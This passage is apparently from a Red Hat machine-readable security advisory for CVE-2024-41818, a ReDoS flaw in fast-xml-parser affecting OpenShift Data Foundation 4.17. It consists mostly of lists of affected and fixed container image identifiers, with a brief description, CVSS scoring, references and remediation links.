"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2300499", }, ], notes: [ { category: "description", text: "A regular expression denial of service (ReDoS) flaw was found in fast-xml-parser in the currency.js script. By sending a specially crafted regex input, a remote attacker could cause a denial of service condition.", title: "Vulnerability description", }, { category: "summary", text: "fast-xml-parser: ReDOS at currency parsing in currency.js", title: "Vulnerability summary", }, { category: "other", text: "Red Hat has decided to rate this vulnerability as Important due to the potential loss of Availability and the low complexity.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-41818", }, { category: "external", summary: "RHBZ#2300499", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2300499", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-41818", url: "https://www.cve.org/CVERecord?id=CVE-2024-41818", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-41818", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-41818", }, { category: "external", summary: "https://github.com/NaturalIntelligence/fast-xml-parser/blob/master/src/v5/valueParsers/currency.js#L10", url: "https://github.com/NaturalIntelligence/fast-xml-parser/blob/master/src/v5/valueParsers/currency.js#L10", }, { category: "external", summary: "https://github.com/NaturalIntelligence/fast-xml-parser/commit/d0bfe8a3a2813a185f39591bbef222212d856164", url: "https://github.com/NaturalIntelligence/fast-xml-parser/commit/d0bfe8a3a2813a185f39591bbef222212d856164", }, { category: "external", summary: "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-mpg4-rc92-vx8v", url: "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-mpg4-rc92-vx8v", }, ], release_date: "2024-07-28T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", 